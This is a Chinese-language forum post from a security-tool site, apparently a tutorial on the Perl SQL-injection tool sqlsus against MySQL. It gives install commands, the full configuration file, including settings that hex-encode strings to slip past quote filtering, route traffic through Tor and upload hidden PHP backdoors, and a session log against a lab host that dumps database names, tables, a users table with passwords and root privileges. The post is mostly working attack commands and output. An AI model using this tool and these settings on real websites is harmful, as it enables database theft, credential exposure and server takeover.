切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
318 sqlsus[复制链接]
发表于 2012-10-13 13:49:13 | 显示全部楼层 |!read_mode!

sqlsus只能用于MYSQL,PERL写的

安装
  1. root@Dis9Team:~# apt-get install libwww-perl libdbd-sqlite3-perl libhtml-linkextractor-perl libterm-readline-gnu-perl liblwp-protocol-socks-perl sqlite3
  2. root@Dis9Team:/pen/sql# wget http://sourceforge.net/projects/sqlsus/files/sqlsus/sqlsus-0.7.2.tgz/download
  3. root@Dis9Team:/pen/sql# tar xf download
  4. root@Dis9Team:/pen/sql# cd sqlsus-0.7.2/
  5. root@Dis9Team:/pen/sql/sqlsus-0.7.2# ./sqlsus -h

  6.               sqlsus version 0.7.2

  7.   Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

  8. Usage:
  9.     sqlsus [options] [config file]

  10.      Options:
  11.          -h, --help                    brief help message
  12.          -v, --version                 version information
  13.          -e, --execute <commands>      execute commands and exit
  14.          -g, --genconf <filename>      generate configuration file

  15. root@Dis9Team:/pen/sql/sqlsus-0.7.2#
复制代码
创建一个配置文件
  1. root@Dis9Team:/pen/sql/sqlsus-0.7.2# ./sqlsus -g mssql.conf

  2.               sqlsus version 0.7.2

  3.   Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

  4. [+] Configuration successfully saved to mssql.conf
  5. root@Dis9Team:/pen/sql/sqlsus-0.7.2# cat mssql.conf
  6. # Configuration file generated by sqlsus 0.7.2
  7. package conf; # do not remove this line
  8. use strict;
  9. use warnings;

  10. #
  11. # Note: only the values that differ from sqlsus defaults are mandatory, so you can have a configuration file with only a few lines in it
  12. #
  13. # All these values will be overriden by the variables you have set in sqlsus in a saved session, provided that $allow_override == 1 (which is the default, see below)
  14. # For example :
  15. # - first run: you launch sqlsus with no cookie defined.
  16. # before the second run, you configure a cookie in your configuration file
  17. # - second run: the cookie is still empty, because the value has been overriden by the one saved
  18. #
  19. # In this case, you need to change the value of the cookie inside sqlsus using "set cookie <cookie>"
  20. # You can always store you running configuration by using "genconf <filename>" inside sqlsus
  21. #

  22. ###############################
  23. ########### GENERAL ###########
  24. # Start of the url used for the injection
  25. # In inband/union mode, it is generally a good idea to append "AND 0" so that the real query returns nothing
  26. # Ex : our $url_start = "http://localhost/script.php?id=1'";
  27. our $url_start = "";

  28. # End of the url used for the injection
  29. # When possible, it is generally a good idea to use "#" here, so that our queries won't be polluted by the original one
  30. # Ex : our $url_end = "#";
  31. our $url_end = "";

  32. # Use POST instead of GET
  33. our $post = 0;

  34. # Use blind injection ?
  35. # set it to 1 for boolean-based blind injection
  36. # set it to 2 for time-based blind injection (requires MySQL >= 5.0.12)
  37. our $blind = 0;

  38. # In boolean-based blind mode, string to be found in the HTML if the statement is true
  39. our $blind_string = "";

  40. # In time-based blind mode, how long in seconds (can be a float) to sleep() when the statement is true
  41. # You must specify a value higher than the maximum delay to be expected in normal conditions
  42. our $blind_sleep = 2;

  43. # Allow the values specified in the configuration file to be overriden by the ones you have set in sqlsus (in a saved session)
  44. our $allow_override = 1;

  45. # User agent to use for HTTP queries
  46. our $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)";

  47. # Display "debug" messages
  48. our $debug = 0;

  49. # Char (not string) to display when something is null / not found
  50. our $null_substitute = "~";

  51. # Hex encode strings in the query ?
  52. # ie: "sqlsus" will be sent as 0x73716c737573, thus escaping quotes filtering
  53. our $hex_encode_strings = 1;

  54. # Maximum running processes used to retrieve data (+main process +hits counter process)
  55. our $processes = 10;

  56. # Amount of seconds to sleep after each server hit. (can be a float)
  57. # Note that it does not take the query / answer time in consideration, it's just a simple sleep() after a hit
  58. our $sleep_after_hit = 0;

  59. # -- maximum amount of data we can send at once --

  60. # Typically, we are restricted either by the web server (URL size) or by the layer underneath (PHP / suhosin)
  61. # Only one of the 2 variables can be set (non 0) at a time, and it will be the only one to be used by sqlsus
  62. # If both are set to 0, using "start" or "autoconf max_sendable", sqlsus will find which restriction apply, and set the variable(s) accordingly

  63. # Maximum amount of data we can send at once to the target (+ the size of the URL itself)
  64. our $max_url_length = 0;

  65. # Maximum amount of data we can send through the injection point
  66. our $max_inj_length = 0;

  67. # ------------------------------------------------

  68. # Max subqueries per query
  69. # Note that setting a really big value here (ie: 900), as well as a high value for max_url_length (when using POST for example), may result in a potentially long computation time for the queries to be prepared
  70. our $max_subqueries = 70;

  71. # Convert spaces to /**/
  72. our $convert_spaces = 0;

  73. # Shall we consider cookies at all ?
  74. our $use_cookie_jar = 1;

  75. # Cookie to use, separate name=value pairs with ;
  76. # This will only have an effect if $use_cookie_jar = 1
  77. our $cookie = "";

  78. # Proxy (HTTP / socks)
  79. # Example for TOR proxying : our $proxy = "socks://localhost:9050";
  80. our $proxy = "";

  81. # Credentials
  82. our $cred_realm = "";
  83. our $cred_user = "";
  84. our $cred_password  = "";

  85. # What HTTP error codes shall we retry on ?
  86. our @http_error_codes = qw(408 500 501 502 503 504);

  87. # Maximum number of times to retry per thread/process on a HTTP error code
  88. our $http_error_retries = 10;

  89. # Variables to get in %target when using "start"
  90. our %target_keys = (
  91.         database => 'database()',
  92.         version => 'version()',
  93.         user => 'current_user'
  94. );

  95. ###############################
  96. ############ DATA #############

  97. # Maximum length before the data returned in the HTML is truncated
  98. # Only used by "download" for the moment
  99. our $max_returned_length = 65530;

  100. # Where to put the data (sessions, files, database(s) dump)
  101. our $datapath = "/root/.sqlsus";

  102. # Where to save downloaded files (via the "download" command)
  103. # such files will be stored in ./$datapath/SERVERNAME/$filespath
  104. our $filespath = "files";

  105. # Binary mode (hex encode in mysql, and hex decode in sqlsus)
  106. # This mode uses twice as much bandwith as in non binary mode
  107. # binary mode is useful for :
  108. # - in blind mode : retrieving non ASCII characters (UTF8 ?) or ones not listed in $default_range (see below)
  109. # - in general    : retrieving binary content
  110. our $binary = 0;

  111. ###############################
  112. ######### INBAND MODE #########

  113. # Maximum number of columns to be used in the UNION statement
  114. # This is used at "start" (or "autoconf select_columns")
  115. our $max_select_cols = 50;

  116. # Columns usable for (inband) injection using union
  117. # example :
  118. # our @columns = qw(0 0 1 0 1);
  119. # 5 columns for union, 3rd and 5th can be used to see the result of the query
  120. # The first "1" will be used as the injection spot
  121. #
  122. # Note that actual values will be used (0 or 1) (except the 1 replaced as the injection spot) in the UNION select query, which might not be what you want
  123. # You can change the entries (but the "1" you want to use) to whatever value suits you
  124. # Unless this variable is set, sqlsus will auto-detect the suitable number of columns to be used for injection
  125. our @columns = qw();

  126. # How to union
  127. our $union_select = "UNION ALL SELECT BINARY";

  128. ###############################
  129. ######### BLIND MODE ##########

  130. # ASCII chars to brute force if no regex matched
  131. our $default_range = join (',', (9,10,32..126));

  132. # Regular expressions to test against each item retrieved on a blind injection
  133. # and the corresponding ASCII values
  134. # NOTE:
  135. # - the values MUST be sorted
  136. # - the regexs will be tried in order
  137. our @regex_rlike = (
  138.         # num
  139.         "^[0-9]+\$", join (',',(48..57)),
  140.         # lower alpha
  141.         "^[a-z_. @]+\$", join (',',(32,46,64,95,97..122)),
  142.         # lower hex
  143.         "^[a-f0-9]+\$", join (',',(48..57,97..102)),
  144.         # upper hex
  145.         "^[A-F0-9]+\$", join (',',(48..57,65..70)),
  146.         # upper alpha
  147.         "^[A-Z_. @]+\$", join (',',(32,46,64,65..90,95)),
  148.         # mixed alpha
  149.         "^[A-Za-z_. @]+\$", join (',',(32,46,64,65..90,95,97..122)),
  150.         # alnum
  151.         "^[a-z0-9._@]+\$", join (',',(46,48..57,64,95,97..122)),
  152.         # datetime
  153.         "^[0-9 [.hyphen-minus.]:]+\$", join (',',(32,45,48..57,58)),
  154.         # mixed alnum + stuff
  155.         "^[A-Za-z0-9._@+/ [.hyphen-minus.][.apostrophe.][.quotation-mark.]%]+\$", join (',',(32,34,37,39,43,45,46,47,48..57,64,65..90,95,97..122))
  156. );

  157. # Maximum length above which an item won't be bruteforced
  158. # Set it high enough if you intend to download files
  159. our $blind_max_length = 4096;


  160. ###############################
  161. ########## TAKEOVER ###########

  162. # Document root, on the web server, of the website we are injecting through
  163. # This MUST be accurate for sqlsus to be able to upload its backdoor by automatically crawling for candidate directories
  164. # Also, the web and mysql server must obviously be on the same box
  165. our $document_root = "/var/www/";

  166. # List of (relative to document root path) directories to try to upload backdoor to
  167. # Leave empty for auto detection by crawling the web server
  168. # ex : our @upload_directories = ("/upload");
  169. our @upload_directories = ();

  170. # Maximum depth to look at when crawling the web server for directories
  171. our $crawler_depth = 5;

  172. # URL of the uploader script, if already uploaded
  173. our $uploader = "";

  174. # What remote filename to use when uploading the tiny uploader
  175. our $uploader_name = ".u.php";

  176. # URL of the backdoor, if already uploaded
  177. our $backdoor = "";

  178. # What remote filename to use when uploading the backdoor
  179. our $backdoor_name = ".b.php";


  180. ###############################
  181. ########### BRUTE #############

  182. # Dynamic string to use for column/table names bruteforcing
  183. # It will be "magically" (perl speaking) incremented and prefix with $table_prefix when applicable
  184. our $brute_start_string = "aaa";

  185. # String to begin the table/column name with
  186. # ex : our $start_string = "cms_";
  187. our $table_prefix = "";

  188. # For each table name, also try an uppercase version for the first char only
  189. our $uc_first = 1;

  190. # For each table name, also try an uppercase version (for all chars)
  191. our $uc_all = 0;

  192. # Tables dictionnary
  193. our @brute_tables_dict = qw(login logins user users group groups perm permissions perms admin admins administrators staff customer customers client clients config configuration member members name names password passwords);

  194. # Columns dictionnary
  195. our @brute_columns_dict = qw(id admin login name user username email emailaddress mail e_mail tel phone number telephone address adress street pw pwd pass password);
复制代码


配置文件操作

编辑配置文件 搜索 our $url_start 写入地址 例如:

  1. our $url_start = "http://192.168.71.130/pen/news.php?id=1 and 1=2";
复制代码
载入配置文件
  1. root@Dis9Team:/pen/sql/sqlsus-0.7.2# ./sqlsus mssql.conf

  2.               sqlsus version 0.7.2

  3.   Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

  4. [+] Session "192.168.71.130" created
  5. sqlsus>
复制代码


注入测试
  1. sqlsus> start
  2. [+] UNION columns already set to (0,1), skipping auto-detection... (use "autoconf select_columns" to do it anyway)
  3. [+] max_url_length already set to 8198 , skipping auto-detection... (use "autoconf max_sendable" to do it anyway)
  4. [+] Filling %target...
  5. +----------+-----------------------------+
  6. | Variable | Value                       |
  7. +----------+-----------------------------+
  8. | database | pentest                     |
  9. | user     | 'root'@'localhost'          |
  10. | version  | 5.1.61-0ubuntu0.10.10.1-log |
  11. +----------+-----------------------------+
  12. 3 rows in set

  13. sqlsus>
复制代码


存在注入获得数据库
  1. sqlsus> get databases
  2. [+] Getting databases names
  3. +-----------+                                                         
  4. | Databases |
  5. +-----------+
  6. | mysql     |
  7. | pentest   |
  8. +-----------+
  9. 2 rows in set

  10. sqlsus>
复制代码


设定数据库
  1. sqlsus> set
  2. database = "pentest"
  3. columns = 0,1
  4. binary = 0
  5. blind_max_length = 4096
  6. proxy = ""
  7. cookie = ""
  8. debug = 0
  9. max_returned_length = 65530
  10. max_url_length = 8198
  11. max_inj_length = 0
  12. max_subqueries = 70
  13. processes = 10
  14. sleep_after_hit = 0
  15. table_prefix = ""
  16. http_error_retries = 10
  17. document_root = "/var/www/"
  18. crawler_depth = 5
  19. uploader = ""
  20. backdoor = ""
  21. sqlsus>
复制代码


默认配置 更改
  1. sqlsus> set database mysql
  2. database = "mysql"
  3. sqlsus> set database
  4. database = "mysql"
复制代码


改回来
  1. sqlsus> set database pentest
  2. database = "pentest"
复制代码


获取表
  1. sqlsus> get tables
  2. [+] Getting tables names
  3.                                                                      
  4. <( pentest )>

  5.         [stuff : 2]
  6.                 id
  7.                 summary

  8.         [users : 2]
  9.                 id
  10.                 username
  11.                 password
复制代码


获得字段
  1. sqlsus> get columns users
  2. [+] Getting columns names for pentest.users
  3. +------------------+                                                  
  4. | Columns in users |
  5. +------------------+
  6. | id               |
  7. | username         |
  8. | password         |
  9. +------------------+
  10. 3 rows in set

  11. sqlsus>
复制代码


获得数据
  1. sqlsus> select * from users
  2. +------------+----------+----------+                                 
  3. | id         | username | password |
  4. +------------+----------+----------+
  5. | 0000000000 | admin    | admin    |
  6. | 0000000001 | guest    | guest    |
  7. +------------+----------+----------+
  8. 2 rows in set (2 hits)

  9. sqlsus>
复制代码


获得privs
  1. sqlsus> get privs
  2. [+] Getting user privileges
  3. +--------------------+-------------------------+                     
  4. | GRANTEE            | PRIVILEGE_TYPE          |
  5. +--------------------+-------------------------+
  6. | 'root'@'localhost' | SELECT                  |
  7. | 'root'@'localhost' | INSERT                  |
  8. | 'root'@'localhost' | UPDATE                  |
  9. | 'root'@'localhost' | DELETE                  |
  10. | 'root'@'localhost' | CREATE                  |
  11. | 'root'@'localhost' | DROP                    |
  12. | 'root'@'localhost' | RELOAD                  |
  13. | 'root'@'localhost' | SHUTDOWN                |
  14. | 'root'@'localhost' | PROCESS                 |
  15. | 'root'@'localhost' | FILE                    |
  16. | 'root'@'localhost' | REFERENCES              |
  17. | 'root'@'localhost' | INDEX                   |
  18. | 'root'@'localhost' | ALTER                   |
  19. | 'root'@'localhost' | SHOW DATABASES          |
  20. | 'root'@'localhost' | SUPER                   |
  21. | 'root'@'localhost' | CREATE TEMPORARY TABLES |
  22. | 'root'@'localhost' | LOCK TABLES             |
  23. | 'root'@'localhost' | EXECUTE                 |
  24. | 'root'@'localhost' | REPLICATION SLAVE       |
  25. | 'root'@'localhost' | REPLICATION CLIENT      |
  26. | 'root'@'localhost' | CREATE VIEW             |
  27. | 'root'@'localhost' | SHOW VIEW               |
  28. | 'root'@'localhost' | CREATE ROUTINE          |
  29. | 'root'@'localhost' | ALTER ROUTINE           |
  30. | 'root'@'localhost' | CREATE USER             |
  31. | 'root'@'localhost' | EVENT                   |
  32. | 'root'@'localhost' | TRIGGER                 |
复制代码





操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-25 07:17

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部